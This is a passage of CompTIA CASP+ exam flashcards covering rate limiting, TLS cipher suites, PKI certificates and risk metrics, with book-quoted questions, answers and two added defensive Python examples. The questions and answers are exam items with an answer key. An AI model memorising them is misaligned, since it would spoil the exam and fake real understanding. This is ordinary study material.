B. Implement geo-blocking on the WAF.
C. Implement OAuth 2.0 on the API.
D. Implement input validation on the API.

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 813-814). Packt Publishing. Kindle Edition.

A

A. Implement rate limiting on the API.

Explanation:
Implement rate limiting on the API. This throttles the number of requests from any one client that are forwarded to the application servers, which relieves the CPU load quickly without requiring authentication changes or code rewrites; the WAF is silent because the requests are well formed.
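Rate limiting at the API gateway is usually a per-client token bucket: each client may burst up to a capacity, then is held to a sustained rate. The following is an added example, not code from the flashcards or the cited book; the request stream, client addresses, capacity and refill rate are constructed for the example, and time is passed in explicitly so the behaviour is deterministic.

```python
class TokenBucketLimiter:
    """Per-client token bucket. A client may burst up to `capacity` requests, after which it is
    held to `refill_per_sec` requests per second. `now` is supplied by the caller (seconds)."""

    def __init__(self, capacity: int, refill_per_sec: float):
        self.capacity = capacity
        self.refill_per_sec = refill_per_sec
        self._buckets = {}  # client key -> (tokens, time of last refill)

    def allow(self, client: str, now: float) -> bool:
        tokens, last = self._buckets.get(client, (self.capacity, now))
        # Refill proportionally to elapsed time, never beyond capacity.
        tokens = min(self.capacity, tokens + (now - last) * self.refill_per_sec)
        if tokens >= 1:
            self._buckets[client] = (tokens - 1, now)
            return True
        self._buckets[client] = (tokens, now)
        return False


def simulate(limiter: TokenBucketLimiter, requests):
    """Apply the limiter to (timestamp, client) pairs; return {client: (allowed, denied)}."""
    stats = {}
    for ts, client in requests:
        allowed, denied = stats.get(client, (0, 0))
        if limiter.allow(client, ts):
            stats[client] = (allowed + 1, denied)
        else:
            stats[client] = (allowed, denied + 1)
    return stats


# Constructed request stream for the example: one source hammering the unauthenticated
# search API, one ordinary client, and the hammering source returning a second later.
CONSTRUCTED_REQUESTS = (
    [(0.0, "198.51.100.7")] * 30
    + [(0.0, "10.0.0.5")] * 3
    + [(1.0, "198.51.100.7")] * 5
)


def run_example():
    # Capacity 10 and 5 requests/second are example values, not a recommendation.
    return simulate(TokenBucketLimiter(capacity=10, refill_per_sec=5.0), CONSTRUCTED_REQUESTS)


if __name__ == "__main__":
    for client, (allowed, denied) in run_example().items():
        print(f"{client}: allowed={allowed} denied={denied}")
```

The burst client gets 10 requests through, has the next 20 dropped, and a second later is allowed 5 more (the refill), while the ordinary client is unaffected because buckets are per key. At the gateway a denied request is answered with HTTP 429 and a Retry-After header so that the application servers never see it.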

38
Q

ACME bank engineers are configuring security for a new data center. They are looking to implement SSL/TLS for customer-facing application servers. Customers will connect to the bank API through a deployed mobile application. They must now choose a symmetric algorithm that offers the greatest speed and security. Which should they choose?

A. ChaCha256 + poly1305
B. 3DES + CBC
C. AES256 + CBC
D. Salsa256 + CBC

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 814). Packt Publishing. Kindle Edition.

A

A. ChaCha256 + poly1305

Explanation:
ChaCha256 + poly1305 (the suite is normally written ChaCha20-Poly1305). It is an AEAD construction that is fast in software, which gives a major performance advantage on mobile devices that lack AES hardware acceleration, and it avoids the padding-oracle weaknesses of CBC modes. 3DES is legacy, AES-CBC is slower on such devices and not authenticated, and Salsa20 is not a standardized TLS cipher.

39
Q

Hackers can gain access to encrypted data transmissions. After performing vulnerability assessments on the application servers, several cipher suites are available for backward compatibility. Which of the following would represent the greatest risk?

A. TLS_RSA_WITH_AES_128_CBC_SHA
B. TLS_RSA_WITH_RC4_40_MD5
C. TLS_DHE_RSA_WITH_AES_256_CBC_SHA
D. TLS_RSA_WITH_3DES_EDE_CBC_SHA

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 814-815). Packt Publishing. Kindle Edition.

A

B. TLS_RSA_WITH_RC4_40_MD5

Explanation:
TLS_RSA_WITH_RC4_40_MD5. RC4 (symmetric stream cipher) is broken and must not be used, and the 40-bit export-grade key is brute-forceable in seconds, so this suite leaves systems out of compliance. MD5 (hashing algorithm) is also weak and should not be used. The static RSA key exchange additionally offers no forward secrecy, which the DHE suite in option C does.
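Cards 5 and 39 are the same assessment from two sides: ranking a server's offered suites by weakness, and understanding why a TLS 1.3 server cannot talk to a client that only offers legacy suites. The following is an added example, not code from the flashcards or the cited book: it parses TLS 1.2-style suite names into key-exchange and cipher parts, scores known weaknesses, and checks whether a ClientHello offer contains any TLS 1.3 suite. The scoring weights are this example's own assumption, not a standard; the TLS 1.3 suite list is from RFC 8446.

```python
# TLS 1.3 cipher suites (RFC 8446, appendix B.4); all AEAD, none names a key exchange.
TLS13_SUITES = {
    "TLS_AES_128_GCM_SHA256",
    "TLS_AES_256_GCM_SHA384",
    "TLS_CHACHA20_POLY1305_SHA256",
    "TLS_AES_128_CCM_SHA256",
    "TLS_AES_128_CCM_8_SHA256",
}

# (substring of the cipher/MAC part, points, reason). Points are this example's weighting.
WEAKNESS_RULES = [
    ("_RC4_", 40, "RC4 is a broken stream cipher (RFC 7465 prohibits it)"),
    ("_40_", 40, "40-bit export-grade key is brute-forceable"),
    ("EXPORT", 40, "export-grade suite"),
    ("_NULL_", 40, "no encryption"),
    ("_DES_", 30, "single DES 56-bit key"),
    ("_MD5", 20, "MD5-based MAC"),
    ("3DES", 15, "3DES 64-bit block size (Sweet32 birthday attack)"),
    ("_CBC_", 5, "CBC mode without AEAD; padding-oracle history"),
]

# The four suites from card 39.
LEGACY_SUITES = [
    "TLS_RSA_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_RC4_40_MD5",
    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
]


def parse_suite(name: str):
    """Split a suite name into (key exchange/authentication, bulk cipher + MAC)."""
    body = name.removeprefix("TLS_")
    if "_WITH_" in body:
        kx, rest = body.split("_WITH_", 1)
    else:  # TLS 1.3-style name: key exchange is negotiated separately
        kx, rest = "", body
    return kx, rest


def assess(name: str):
    """Return (risk score, reasons); 0 means no weakness matched by the rules above."""
    kx, rest = parse_suite(name)
    score, reasons = 0, []
    padded = "_" + rest + "_"
    for needle, points, reason in WEAKNESS_RULES:
        if needle in padded:
            score += points
            reasons.append(reason)
    if kx and not kx.startswith(("DHE", "ECDHE")):
        score += 10
        reasons.append("static key exchange: no forward secrecy")
    return score, reasons


def rank_by_risk(suites):
    """Highest-risk suite first, as (name, score, reasons)."""
    scored = [(s, *assess(s)) for s in suites]
    return sorted(scored, key=lambda t: t[1], reverse=True)


def tls13_handshake_possible(client_offer):
    """Whether a TLS 1.3-only server has any suite in common with this ClientHello offer.
    Legacy names such as RC4 suites are ignored by TLS 1.3, so a client offering only those
    is refused; browsers surface that as a version/cipher mismatch error."""
    return bool(TLS13_SUITES & set(client_offer))


if __name__ == "__main__":
    for name, score, reasons in rank_by_risk(LEGACY_SUITES):
        print(f"{score:>4}  {name}  {'; '.join(reasons) or 'ok'}")
    print("RC4-only client vs TLS 1.3 server:",
          tls13_handshake_possible(["TLS_RSA_WITH_RC4_128_SHA", "TLS_RSA_WITH_RC4_128_MD5"]))
```

Against the card's four suites the RC4/40-bit/MD5 suite scores far above the rest, the 3DES suite comes next, and the DHE suite is the only one with forward secrecy. The same substring rules applied to a scanner's output (for example an `openssl s_client` or `nmap --script ssl-enum-ciphers` listing) give a first-pass ranking before manual review.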

40
Q

A company is deploying an online streaming service for customers. The content needs to be protected; only the paid subscribers should be able to view the streams. The company wants to choose the best solution for low latency and security. What would be the best choice?

A. 3DES
B. AES
C. ChaCha
D. RC4

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 815). Packt Publishing. Kindle Edition.

A

C. ChaCha

Explanation:
ChaCha20 is a stream cipher that performs very well in software, so it offers low latency for streaming media; RC4 is also a stream cipher but is broken and must not be used, and 3DES is slow and legacy.

41
Q

A government agency is configuring a VPN connection between Fort Meade and a field office in New York. Of primary importance is having a highly secure key exchange protocol due to the threats posed by nation state threat actors. Which encryption protocol would be a good choice?

A. Advanced Encryption Standard (AES)
B. ECDHE p521
C. ChaCha-256
D. SHA-512

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 815). Packt Publishing. Kindle Edition.

A

B. ECDHE p521

Explanation:
ECDHE p521 is currently the strongest form of key exchange. The other answers refer to symmetric encryption or hashing.

42
Q

Software developers are deploying a new customer-facing CRM tool. The deployment will require the customers to download an application on their system. Customers must be able to verify that the application is trustworthy. What type of certificate will the software developers request to fulfill this requirement?

A. Client authentication
B. Server authentication
C. Digital signatures
D. Code signing

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 815-816). Packt Publishing. Kindle Edition.

A

D. Code signing

Explanation:
The application code needs to be digitally signed.

43
Q

A large insurance provider has grown in size and now supports customers in many different countries. Due to this increased footprint, they are looking to minimize administration by allocating a single certificate to multiple sites. The sites will be country-specific, with different domain names. What would be the best choice for delivering this requirement?

A. Wildcard certificate
B. Extended validation
C. General-purpose
D. Subject Alternate Name (SAN)

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 816). Packt Publishing. Kindle Edition.

A

D. Subject Alternate Name (SAN)

Explanation:
This will allow a single certificate to be issued for multiple sites. A wildcard would not be suitable as the domain names will be different.

44
Q

The CISO is delivering a security briefing to senior members of staff. One of the topics of conversation concerns the current e-commerce site. During a Q&A session, the CISO is asked questions about PKI and certificates. A rudimentary question is asked: what key is stored on a certificate? What should the CISO answer?

A. Public key
B. Private key
C. Public and private keys
D. Signing key

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 816-817). Packt Publishing. Kindle Edition.

A

A. Public key

Explanation:
A digital certificate validates the public key. Private keys are not shared but can be stored in escrow if a copy needs to be made.

45
Q

A large online bank would like to ensure that customers can quickly validate that the bank’s certificates are not part of a CRL. What would best meet this requirement?

A. Extended validation
B. Certificate pinning
C. OCSP
D. CRL

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 817). Packt Publishing. Kindle Edition.

A

C. OCSP

Explanation:
OCSP allows a quick response to be provided when a revocation (CRL) check is required.

46
Q

Website engineers are configuring security extensions to be deployed to all customer-facing web application servers. What HTTP extension will ensure that all the connections to the application servers will also be encrypted using the assigned X.509 certificate?

A. HTTP X-FRAME headers
B. HTTP Strict Transport Security (HSTS)
C. HTTPS SSL 3.0 CBC
D. Extended validation

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 817). Packt Publishing. Kindle Edition.

A

B. HTTP Strict Transport Security (HSTS)

Explanation:
HSTS will ensure that all connections are forced to use HTTPS/TLS.

47
Q

Nation state-sponsored actors have stolen the smartphone of a government official. They have attempted to guess the PIN code several times, eventually locking the device. They are attempting to gain access to the data using forensic tools and techniques but the data cannot be accessed. What has likely prevented a data breach from occurring?

A. Hardware write blocker
B. USB data blocker
C. Crypto shredding
D. Improper key handling

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 817-818). Packt Publishing. Kindle Edition.

A

C. Crypto shredding

Explanation:
The symmetric key that was used to encrypt the data is destroyed, making data recovery ineffective.

48
Q

A small startup energy company has built up a database of clients. It is estimated that this database is worth $100,000. During a data breach, a cyber-criminal (working for a competitor) steals 10% of the records. The company fails to put adequate controls in place and a second breach occurs within 12 months. What is the Annual Loss Expectancy (ALE)?

A. $200,000
B. $1,000
C. $20,000
D. $10,000

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 818). Packt Publishing. Kindle Edition.

A

C. $20,000

Explanation:
The Single Loss Expectancy (SLE) is 10% of $100,000 = $10,000. Two breaches occur within 12 months, so the Annualized Rate of Occurrence (ARO) is 2. ALE = SLE x ARO = $10,000 x 2 = $20,000.
49
Q

A defense contractor currently loses an estimated $2,000,000 each year due to intellectual property theft. The company has a solid reputation for R&D and manufacturing but has no dedicated security staff. A Managed Security Service Provider (MSSP) guarantees that they will provide 90% protection for the data over a 5-year contract at a cost of $250,000 per annum. What is the ROI in dollars?

A. $10,000,000
B. $9,000,000
C. $750,000
D. $7,750,000

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (pp. 818-819). Packt Publishing. Kindle Edition.

A

D. $7,750,000

Explanation:
The contract is for 5 years, so the potential loss would be 5 x 2,000,000 = 10,000,000. As we mitigate 90% of the loss, we have saved 9,000,000 but must pay 5 x 250,000 = 1,250,000, giving an ROI of 9,000,000 - 1,250,000 = 7,750,000.

50
Q

An automobile manufacturer suffers a power outage at one of its foundries. The facility supplies critical components for the company. The COOP designated the foundry as a mission-essential service, and it was agreed that the foundry must be operational within 24 hours. The energy supplier has struggled to repair severe storm-damaged cables. As a result, the facility is without power for 72 hours. What is the metric that describes this 72-hour outage?

A. Mean time to recovery (MTTR)
B. Mean time between failure (MTBF)
C. Recovery Time Objective (RTO)
D. Annualized rate of occurrence (ARO)

Birch, Mark. CompTIA CASP+ CAS-004 Certification Guide: Develop CASP+ skills and learn all the key topics needed to prepare for the certification exam (p. 819). Packt Publishing. Kindle Edition.

A

A. Mean time to recovery (MTTR)

Explanation:
The 72 hours is the actual time taken to restore the facility, which is the mean time to recovery (MTTR). The 24 hours agreed in the COOP is the Recovery Time Objective (RTO), the target that the outage exceeded.
51
Q
A